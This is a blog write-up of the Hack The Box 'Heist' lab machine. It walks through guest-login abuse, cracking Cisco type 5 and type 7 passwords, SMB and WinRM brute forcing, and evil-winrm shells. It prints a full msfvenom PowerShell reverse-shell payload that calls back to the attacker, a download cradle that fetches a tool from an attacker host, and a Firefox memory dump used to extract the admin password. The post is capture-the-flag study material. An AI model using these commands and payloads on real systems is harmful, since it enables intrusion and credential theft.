WriteUp: Intro to Dante – Heist 2/6

Infraestrutura, Recon, Security, Web 6 Minutes

In this post we will talk about the Heist, the second challenge for the HTB Track “Intro to Dante”.

HTB Heist banner

TL:DR

The Attack Kill chain/Steps can be mapped to:

  • Recon and Enumeration (HTTP and SMB/MSRPC services)
  • Broken Authentication at HTTP service by Abusing Login as Guest Functionality
  • Sensitive files with hashed passwords from an thread in Issue dashboard
  • Crack The Cisco passwords and compromise the hazard user by brute force attack
  • Abusing hazard privileges to perform enumeration against SMB/MSRPC
  • Compromise of Chase user by brute force attack
  • Command Execution by spawned an Evil-WinRm shell under Chase privileges
  • Compromise of Admin credentials by data inside Firefox process dump.

Reconnaissance and Enumeration

During the reconnaissance with nmap the attacker identified the open ports 80/TCP, 135/TCP e 445/TCP.

Nmap Results

Web Services – 80/TCP

Accessing the HTTP service at port 80/TCP, the attacked is able to authenticated as a Guest User.

Feature “Login as Guest” enabled in the application

When the attacker is use the feature “Login as guest”, the application redirects to an internal service desk tickets dashboard, exposing internal communications. The main thread contains a log file attached with command line history for the problem related at the issue opened.

Access to Issues dashboard

Accessing the log file available at URL “http://10.10.10.149/attachments/config.txt”, its reveals two type 7 Cisco passwords and one type 5 Cisco Password.

Hashed Passwords and Usernames inside the config.txt file

Cripto Attacks – Decrypting hashed passwords

To crack the passwords, the attacker used the online service located at URL:

Decripting the Type 7 Cisco Password
  • username rout3r password 7 0242114B0E143F015F5D1E161713
    • Cracked Password: $uperP@ssword
  • username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
    • Cracked Password: Q4)sJu\Y8qz*A3?d
  • enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
    • Cracked Password: stealth1agent

SMB Enumeration – Hazard User

After the attacker performs an bruteforce attack against the users enumerated in the Issues page and the config.txt file with the cracked passwords, one valid credential is obtained, allowing access to SMB services as Hazard privileges. 

smbmap -u hazard -p 'stealth1agent' -H 10.10.10.149
Confirming the credentials for user hazard using SMBMAP

Enumerating usernames

To enumerate valid usernames, the attacker abused the services SMB/MSRPC in the context of hazard privileges with the impact-lookupsid tool.

impacket-lookupsid hazard:stealth1agent@10.10.10.149
Impacket-Lookupsid Output reveals valid users based on SID enumeration
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)

BruteForcing Users

To identified new valid credentials, the attacker performs a brute force using the previously cracked passwords and the recently user list.

In order to perform the procedure, two files has been prepared, the first one with the usernames splitted by line and the same for the passwords in the other file.

To perform the attack, the crackmapexec with the WinRM module has been used. 

crackmapexec winrm  -u users-clean.list -p passwords -d 'SUPPORTDESK' 10.10.10.149  --continue-on-success
CrackMapExec identified domain user SUPPORTDESK\Chase

As a result, the domain user SUPPORTDESK\Chase has been compromised.

Initial Compromise – Command Execution: SUPPORTDESK\CHASE privileges

In order to obtain a shell on target server, the attacker uses the Evil-WinRm program to spawned a shell under the domain user SUPPORTDESK\CHASE

sudo evil-winrm -i heist.htb -u 'Chase'   -p 'Q4)sJu\Y8qz*A3?d'
Executing evil-winrm with Chase credentials

Compromising User flag

The user.txt flag is located at C:\Users\Chase\Desktop\user.txt and can be access through the Evil-WinRM shell under domain user SUPPORTDESK\Chase privileges.

Flag user.txt

Privilege Escalation – Hunting for Administrator

In order to obtain more functionality, the attacker uses the Metasploit framework and setup a multi handler with payload set to windows/powershell_reverse_tcp.

Metasploit multi handler configurations

To execute the reverse shell, the attacker uses the msfvenom utility to generate a powershell payload, and then, executes the payload inside the previously WinRM shell spawned. 

sudo msfvenom -p windows/x64/powershell_reverse_tcp LHOST=10.10.14.4 LPORT=443 -f raw

The output from msfvenom has been copy and paste to the WinRm shell and executed. 

powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAAEIMmECA51WbW/iRhD+zq8YUfewFbwiafolUk7lnFwbKb1DB20+IKQs9hDcmF1ud82LEv57Z+01NiHRNbWQwLuzzzzzzMvyEwzkGtUsFxDCnUqNQQHTLXyir1GuBCr4AFd8hfAHV8m21SLL2KRSwO9owjucxlmKwkDrqQX0eOsYLuELrsOv038wNhCOtkv8whdIi4aRfVTYV8bsL41XOON5ZiKFCe2kPNME4RmV495qoORmy15Y0HpjpbJt7WqKyyq01hMU+wOu+MIvf4+HRqXiYeJFcrHgIukerg51FkvxYvFKrkUmeVKsBg5TyRi1BifAQiZ5hpbgb34ApUk6A79yAyF+h/Y0FUk7KDbLc8XZLNUkP0l+SS639HvBrGpDGT+i0WwUL2+dxeT8/Jfjc0wbrox16xwXuy5Dlw27fhzj0hBemQ2/ZLJ7i63CFSqNx4T30I2Mv0Y8GjhH7dMes59zdt7uUgzOcavUThuFfGGZlsCMamxYrBHDmluZmpKaLZO2y0SDmNbZsAJ7gxvGOZX7lg0rU9/573ozqifs+k/eiNB3EHIN44Mz33AhDUaoTDpLY27wb56lCbdFF/Esm/L4cRIEr9Bh/dzMbcXaQ339iipBI3O1HnU8TcHG063B8WTi2W9bcj3Gznr0PP/81Ns5TVEk1bY/NrgxDEUsE1vPFxf9YXRzE1idP1kbv31HhSnXupwKwzlmGahcCLIGUiHXVJxtOAEPxerCvgnb2ie0RgnZb8RyscxNvXkvIrncqvRhbsCPAjjrnf4Kf6axklrODERSLaUq1GPQtx6tpQaF5GCFCbsX98IVn9OE2VGFfh1dt9etX9gtigczb9ZM1bnNqjkqmvdJNT6ZwC1BWm1c17M9z/dzrU59luqax3PiXIJCKvZTpbaqadvHPxjGAauiLedWhRQ834iVfMTwerMkbTXpvUfZHTbiu5ToDIbQoTwXLG5lXGQyYANu5rTa+dj536lbz9MMfd9Lix4oj39DnvhlxXeh1wXv4FwAoUDoHeX22tLHZEShvHVBueFgTVgR4rULuUahFueWSgPNzahC5ioc8NLgRVnRRLBaHiUAwmrSluBnHz+cwjN8zU1YooKT4gDqDApBKmAS+QcpgE4NsrFEPFRKqnFvcuCswbrYZ3GGXPnBawwumy/U+JvWcSf9p/KpYX7YOs1SOWqc6sznLNfz/d3rxqC7UKJManTx1Nfh0MhldQfS/4fW/n/DPjnuBoTQ3T12gPwLcZNvvTsJAAA='))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
Executing the Payload windows/x64/powershell_reverse_tcp inside the WInRM Shell

In order to obtain use meterpreter functionality, the attacker used the module post/multi/manage/shell_to_meterpreter from Metasploit Framework and executes against the previously reverse shell spawned.

Under Chase privileges, the attacker was able to identified Firefox Process running with process list commands. In this scenario, the attacker managed to dump the Firefox memory process using the procdump64.exe from SysInternals .

The Procdump has been download to the attacker machine and delivered to the target machine using Cradle procedures from powershell cmdlets.

iwr -UseBasicParsing - Uri http://atackker/processdump64.exe -Outfile processdump64.exe
Attacker HTTP server receiving the connection from the Cradle powershell command executed at target machine

To obtain the PID from the Firefox process, the attacker used PS command inside an powershell interpreter previously spawned.

Identifying the firefox PID

With the kwnoleged of Firefox PID, the attacker is able to executes the procdump64 to performs a full process memory Dump. 

.\procdump64.exe -accepteula -ma 6156
procdump64.exe Dump Types from help opton
Performing the Process dump against the Firefox PID (6156)
Confirming the success of the routine by listing the directory and check the dump file existance

To work in the dump file, the attacker uses the previously meterpreter shell to download the file from the target machine to attacker machine.

Exfiltrating the Dump file to attacker machine

To obtain data from the previously obtained dump file for Firefox process, the attacker used the linux command strings and filter with grep for sensitive keywords like admin.

The routine reveals the admin credentials inside an HTTP GET request under login_password parameter.

Admin Credentials extracted from Firefox Process Dump File
\;C:\Users\Administrator\AppData\Local\Microsoft\WindowsApps;;C:\Users\Chase\AppData\Local\Microsoft\WindowsApps
localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
  • admin@support.htb 4dD!5}x/re8]FBuZ

Compromising Root flag

With admin credentials, the attacker spwned a shell using evil-winrm like before, but this time for the user Administrator. Inside the shell, the attacker identified the root.txt flag under the directory C:\Users\Administrator\Documents\root.txt and managed to read using the get-content cmdlet.

Compromising the root flag

Considerations

The Password Cracking has been done by using online services of some kind raibow tables I Think, but it could be done using local dictionary attacks with hashcat or John The Ripper too.

At the point to obtain the admin credentials from the firefox process i think there’s another solution by starting a traffic sniffing technique, but, during the time I’m not able to use the meterpreter sniffer modules by some unknown reason (nonsense error get from meterpreter). I don’t tried any other method to perform traffic sniffing, so i will leave this point open.

The box is fun and makes a progressive exploitation, the privilege escalation to admins by abusing the Firefox process makes me remember to play more with process dumping to get low hanging fruits.

References

Unknown's avatar

Published by Anom

Published

One thought on “WriteUp: Intro to Dante – Heist 2/6

  1. Pingback: Review: eLearnSecurity Certified Penetration Tester eXtreme (eCPTXv2) – Computer Addicted

Leave a comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.